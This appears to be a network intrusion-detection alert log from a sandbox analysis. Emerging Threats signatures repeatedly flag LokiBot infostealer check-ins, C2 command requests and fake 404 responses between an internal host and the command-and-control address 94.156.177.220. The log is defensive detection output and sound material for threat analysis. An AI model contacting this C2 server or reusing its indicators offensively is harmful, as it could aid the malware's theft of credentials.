2024-10-27T08:51:10.443346+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50019	94.156.177.220	80	TCP
2024-10-27T08:51:11.421296+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50019	94.156.177.220	80	TCP
2024-10-27T08:51:11.421296+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50019	94.156.177.220	80	TCP
2024-10-27T08:51:11.426973+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50019	TCP
2024-10-27T08:51:11.588271+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50027	94.156.177.220	80	TCP
2024-10-27T08:51:11.588271+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50027	94.156.177.220	80	TCP
2024-10-27T08:51:11.588271+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50027	94.156.177.220	80	TCP
2024-10-27T08:51:12.576722+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50027	94.156.177.220	80	TCP
2024-10-27T08:51:12.576722+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50027	94.156.177.220	80	TCP
2024-10-27T08:51:12.583566+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50027	TCP
2024-10-27T08:51:12.760458+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50028	94.156.177.220	80	TCP
2024-10-27T08:51:12.760458+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50028	94.156.177.220	80	TCP
2024-10-27T08:51:12.760458+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50028	94.156.177.220	80	TCP
2024-10-27T08:51:13.725956+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50028	94.156.177.220	80	TCP
2024-10-27T08:51:13.725956+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50028	94.156.177.220	80	TCP
2024-10-27T08:51:13.731892+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50028	TCP
2024-10-27T08:51:13.933889+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50029	94.156.177.220	80	TCP
2024-10-27T08:51:13.933889+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50029	94.156.177.220	80	TCP
2024-10-27T08:51:13.933889+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50029	94.156.177.220	80	TCP
2024-10-27T08:51:14.886637+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50029	94.156.177.220	80	TCP
2024-10-27T08:51:14.886637+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50029	94.156.177.220	80	TCP
2024-10-27T08:51:14.892433+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50029	TCP
2024-10-27T08:51:15.074619+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50030	94.156.177.220	80	TCP
2024-10-27T08:51:15.074619+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50030	94.156.177.220	80	TCP
2024-10-27T08:51:15.074619+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50030	94.156.177.220	80	TCP
2024-10-27T08:51:16.035982+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50030	94.156.177.220	80	TCP
2024-10-27T08:51:16.035982+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50030	94.156.177.220	80	TCP
2024-10-27T08:51:16.041623+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50030	TCP
2024-10-27T08:51:17.193763+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50031	94.156.177.220	80	TCP
2024-10-27T08:51:17.193763+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50031	94.156.177.220	80	TCP
2024-10-27T08:51:17.193763+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50031	94.156.177.220	80	TCP
2024-10-27T08:51:18.145683+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50031	94.156.177.220	80	TCP
2024-10-27T08:51:18.145683+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50031	94.156.177.220	80	TCP
2024-10-27T08:51:18.151497+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50031	TCP
2024-10-27T08:51:18.323356+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50032	94.156.177.220	80	TCP
2024-10-27T08:51:18.323356+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50032	94.156.177.220	80	TCP
2024-10-27T08:51:18.323356+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50032	94.156.177.220	80	TCP
2024-10-27T08:51:19.308400+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50032	94.156.177.220	80	TCP
2024-10-27T08:51:19.308400+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50032	94.156.177.220	80	TCP
2024-10-27T08:51:19.314409+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50032	TCP
2024-10-27T08:51:19.490866+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50033	94.156.177.220	80	TCP
2024-10-27T08:51:19.490866+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50033	94.156.177.220	80	TCP
2024-10-27T08:51:19.490866+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50033	94.156.177.220	80	TCP
2024-10-27T08:51:20.460366+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50033	94.156.177.220	80	TCP
2024-10-27T08:51:20.460366+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50033	94.156.177.220	80	TCP
2024-10-27T08:51:20.467042+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50033	TCP
2024-10-27T08:51:20.662609+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50034	94.156.177.220	80	TCP
2024-10-27T08:51:20.662609+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50034	94.156.177.220	80	TCP
2024-10-27T08:51:20.662609+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50034	94.156.177.220	80	TCP
2024-10-27T08:51:21.617533+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50034	94.156.177.220	80	TCP
2024-10-27T08:51:21.617533+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50034	94.156.177.220	80	TCP
2024-10-27T08:51:21.623834+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50034	TCP
2024-10-27T08:51:21.790345+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50035	94.156.177.220	80	TCP
2024-10-27T08:51:21.790345+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50035	94.156.177.220	80	TCP
2024-10-27T08:51:21.790345+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50035	94.156.177.220	80	TCP
2024-10-27T08:51:22.748835+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50035	94.156.177.220	80	TCP
2024-10-27T08:51:22.748835+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50035	94.156.177.220	80	TCP
2024-10-27T08:51:22.754368+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50035	TCP
2024-10-27T08:51:22.926086+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50036	94.156.177.220	80	TCP
2024-10-27T08:51:22.926086+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50036	94.156.177.220	80	TCP
2024-10-27T08:51:22.926086+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50036	94.156.177.220	80	TCP
2024-10-27T08:51:23.872533+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50036	94.156.177.220	80	TCP
2024-10-27T08:51:23.872533+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50036	94.156.177.220	80	TCP
2024-10-27T08:51:23.878068+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50036	TCP
2024-10-27T08:51:24.055966+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50037	94.156.177.220	80	TCP
2024-10-27T08:51:24.055966+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50037	94.156.177.220	80	TCP
2024-10-27T08:51:24.055966+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50037	94.156.177.220	80	TCP
2024-10-27T08:51:25.027152+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50037	94.156.177.220	80	TCP
2024-10-27T08:51:25.027152+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50037	94.156.177.220	80	TCP
2024-10-27T08:51:25.032793+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50037	TCP
2024-10-27T08:51:25.206621+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50038	94.156.177.220	80	TCP
2024-10-27T08:51:25.206621+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50038	94.156.177.220	80	TCP
2024-10-27T08:51:25.206621+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50038	94.156.177.220	80	TCP
2024-10-27T08:51:26.181621+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50038	94.156.177.220	80	TCP
2024-10-27T08:51:26.181621+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50038	94.156.177.220	80	TCP
2024-10-27T08:51:26.187213+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50038	TCP
2024-10-27T08:51:26.372207+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50039	94.156.177.220	80	TCP
2024-10-27T08:51:26.372207+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50039	94.156.177.220	80	TCP
2024-10-27T08:51:26.372207+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50039	94.156.177.220	80	TCP
2024-10-27T08:51:27.344814+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50039	94.156.177.220	80	TCP
2024-10-27T08:51:27.344814+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50039	94.156.177.220	80	TCP
2024-10-27T08:51:27.350814+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50039	TCP
2024-10-27T08:51:27.522769+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50040	94.156.177.220	80	TCP
2024-10-27T08:51:27.522769+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50040	94.156.177.220	80	TCP
2024-10-27T08:51:27.522769+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50040	94.156.177.220	80	TCP
2024-10-27T08:51:28.479199+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50040	94.156.177.220	80	TCP
2024-10-27T08:51:28.479199+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50040	94.156.177.220	80	TCP
2024-10-27T08:51:28.485166+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50040	TCP
2024-10-27T08:51:28.649111+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50041	94.156.177.220	80	TCP
2024-10-27T08:51:28.649111+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50041	94.156.177.220	80	TCP
2024-10-27T08:51:28.649111+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50041	94.156.177.220	80	TCP
2024-10-27T08:51:29.603188+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50041	94.156.177.220	80	TCP
2024-10-27T08:51:29.603188+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50041	94.156.177.220	80	TCP
2024-10-27T08:51:29.608903+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50041	TCP
2024-10-27T08:51:29.900539+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50042	94.156.177.220	80	TCP
2024-10-27T08:51:29.900539+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50042	94.156.177.220	80	TCP
2024-10-27T08:51:29.900539+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50042	94.156.177.220	80	TCP
2024-10-27T08:51:30.871101+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50042	94.156.177.220	80	TCP
2024-10-27T08:51:30.871101+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50042	94.156.177.220	80	TCP
2024-10-27T08:51:30.876689+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50042	TCP
2024-10-27T08:51:31.042666+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50043	94.156.177.220	80	TCP
2024-10-27T08:51:31.042666+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50043	94.156.177.220	80	TCP
2024-10-27T08:51:31.042666+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50043	94.156.177.220	80	TCP
2024-10-27T08:51:32.013513+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50043	94.156.177.220	80	TCP
2024-10-27T08:51:32.013513+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50043	94.156.177.220	80	TCP
2024-10-27T08:51:32.019216+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50043	TCP
2024-10-27T08:51:32.200989+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50044	94.156.177.220	80	TCP
2024-10-27T08:51:32.200989+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50044	94.156.177.220	80	TCP
2024-10-27T08:51:32.200989+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50044	94.156.177.220	80	TCP
2024-10-27T08:51:33.157667+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50044	94.156.177.220	80	TCP
2024-10-27T08:51:33.157667+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50044	94.156.177.220	80	TCP
2024-10-27T08:51:33.163438+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50044	TCP
2024-10-27T08:51:33.352982+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50045	94.156.177.220	80	TCP
2024-10-27T08:51:33.352982+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50045	94.156.177.220	80	TCP
2024-10-27T08:51:33.352982+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50045	94.156.177.220	80	TCP
2024-10-27T08:51:34.329371+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50045	94.156.177.220	80	TCP
2024-10-27T08:51:34.329371+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50045	94.156.177.220	80	TCP
2024-10-27T08:51:34.335225+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50045	TCP
2024-10-27T08:51:34.500867+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50046	94.156.177.220	80	TCP
2024-10-27T08:51:34.500867+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50046	94.156.177.220	80	TCP
2024-10-27T08:51:34.500867+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50046	94.156.177.220	80	TCP
2024-10-27T08:51:35.462045+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50046	94.156.177.220	80	TCP
2024-10-27T08:51:35.462045+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50046	94.156.177.220	80	TCP
2024-10-27T08:51:35.468657+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50046	TCP
2024-10-27T08:51:35.646903+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50047	94.156.177.220	80	TCP
2024-10-27T08:51:35.646903+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50047	94.156.177.220	80	TCP
2024-10-27T08:51:35.646903+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50047	94.156.177.220	80	TCP
2024-10-27T08:51:36.719219+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50047	94.156.177.220	80	TCP
2024-10-27T08:51:36.719219+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50047	94.156.177.220	80	TCP
2024-10-27T08:51:36.727006+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50047	TCP
2024-10-27T08:51:36.996360+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50048	94.156.177.220	80	TCP
2024-10-27T08:51:36.996360+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50048	94.156.177.220	80	TCP
2024-10-27T08:51:36.996360+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50048	94.156.177.220	80	TCP
2024-10-27T08:51:37.950107+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50048	94.156.177.220	80	TCP
2024-10-27T08:51:37.950107+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50048	94.156.177.220	80	TCP
2024-10-27T08:51:37.955750+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50048	TCP
2024-10-27T08:51:38.141525+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50049	94.156.177.220	80	TCP
2024-10-27T08:51:38.141525+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50049	94.156.177.220	80	TCP
2024-10-27T08:51:38.141525+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50049	94.156.177.220	80	TCP
2024-10-27T08:51:39.128508+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50049	94.156.177.220	80	TCP
2024-10-27T08:51:39.128508+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50049	94.156.177.220	80	TCP
2024-10-27T08:51:39.134567+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50049	TCP
2024-10-27T08:51:39.303118+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50050	94.156.177.220	80	TCP
2024-10-27T08:51:39.303118+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50050	94.156.177.220	80	TCP
2024-10-27T08:51:39.303118+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50050	94.156.177.220	80	TCP
2024-10-27T08:51:40.256100+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50050	94.156.177.220	80	TCP
2024-10-27T08:51:40.256100+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50050	94.156.177.220	80	TCP
2024-10-27T08:51:40.261845+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50050	TCP
2024-10-27T08:51:40.420434+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50051	94.156.177.220	80	TCP
2024-10-27T08:51:40.420434+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50051	94.156.177.220	80	TCP
2024-10-27T08:51:40.420434+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50051	94.156.177.220	80	TCP
2024-10-27T08:51:41.380145+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50051	94.156.177.220	80	TCP
2024-10-27T08:51:41.380145+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50051	94.156.177.220	80	TCP
2024-10-27T08:51:41.385746+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50051	TCP
2024-10-27T08:51:41.538598+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50052	94.156.177.220	80	TCP
2024-10-27T08:51:41.538598+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50052	94.156.177.220	80	TCP
2024-10-27T08:51:41.538598+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50052	94.156.177.220	80	TCP
2024-10-27T08:51:42.532682+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50052	94.156.177.220	80	TCP
2024-10-27T08:51:42.532682+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50052	94.156.177.220	80	TCP
2024-10-27T08:51:42.539849+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50052	TCP
2024-10-27T08:51:42.700130+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50053	94.156.177.220	80	TCP
2024-10-27T08:51:42.700130+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50053	94.156.177.220	80	TCP
2024-10-27T08:51:42.700130+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50053	94.156.177.220	80	TCP
2024-10-27T08:51:43.667954+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50053	94.156.177.220	80	TCP
2024-10-27T08:51:43.667954+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50053	94.156.177.220	80	TCP
2024-10-27T08:51:43.674138+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50053	TCP
2024-10-27T08:51:43.837038+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50054	94.156.177.220	80	TCP
2024-10-27T08:51:43.837038+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50054	94.156.177.220	80	TCP
2024-10-27T08:51:43.837038+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50054	94.156.177.220	80	TCP
2024-10-27T08:51:44.793693+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50054	94.156.177.220	80	TCP
2024-10-27T08:51:44.793693+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50054	94.156.177.220	80	TCP
2024-10-27T08:51:44.799506+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50054	TCP
2024-10-27T08:51:45.061399+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50055	94.156.177.220	80	TCP
2024-10-27T08:51:45.061399+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50055	94.156.177.220	80	TCP
2024-10-27T08:51:45.061399+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50055	94.156.177.220	80	TCP
2024-10-27T08:51:46.014878+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50055	94.156.177.220	80	TCP
2024-10-27T08:51:46.014878+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50055	94.156.177.220	80	TCP
2024-10-27T08:51:46.021732+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50055	TCP
2024-10-27T08:51:46.189175+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50056	94.156.177.220	80	TCP
2024-10-27T08:51:46.189175+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50056	94.156.177.220	80	TCP
2024-10-27T08:51:46.189175+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50056	94.156.177.220	80	TCP
2024-10-27T08:51:47.142826+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50056	94.156.177.220	80	TCP
2024-10-27T08:51:47.142826+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50056	94.156.177.220	80	TCP
2024-10-27T08:51:47.148641+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50056	TCP
2024-10-27T08:51:47.637134+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50057	94.156.177.220	80	TCP
2024-10-27T08:51:47.637134+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50057	94.156.177.220	80	TCP
2024-10-27T08:51:47.637134+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50057	94.156.177.220	80	TCP
2024-10-27T08:51:48.595470+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50057	94.156.177.220	80	TCP
2024-10-27T08:51:48.595470+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50057	94.156.177.220	80	TCP
2024-10-27T08:51:48.601144+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50057	TCP
2024-10-27T08:51:48.773539+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50058	94.156.177.220	80	TCP
2024-10-27T08:51:48.773539+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50058	94.156.177.220	80	TCP
2024-10-27T08:51:48.773539+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50058	94.156.177.220	80	TCP
2024-10-27T08:51:49.779117+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50058	94.156.177.220	80	TCP
2024-10-27T08:51:49.779117+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50058	94.156.177.220	80	TCP
2024-10-27T08:51:49.784943+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50058	TCP
2024-10-27T08:51:49.971106+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50059	94.156.177.220	80	TCP
2024-10-27T08:51:49.971106+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50059	94.156.177.220	80	TCP
2024-10-27T08:51:49.971106+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50059	94.156.177.220	80	TCP
2024-10-27T08:51:50.937949+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50059	94.156.177.220	80	TCP
2024-10-27T08:51:50.937949+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50059	94.156.177.220	80	TCP
2024-10-27T08:51:50.943802+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50059	TCP
2024-10-27T08:51:51.110434+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50060	94.156.177.220	80	TCP
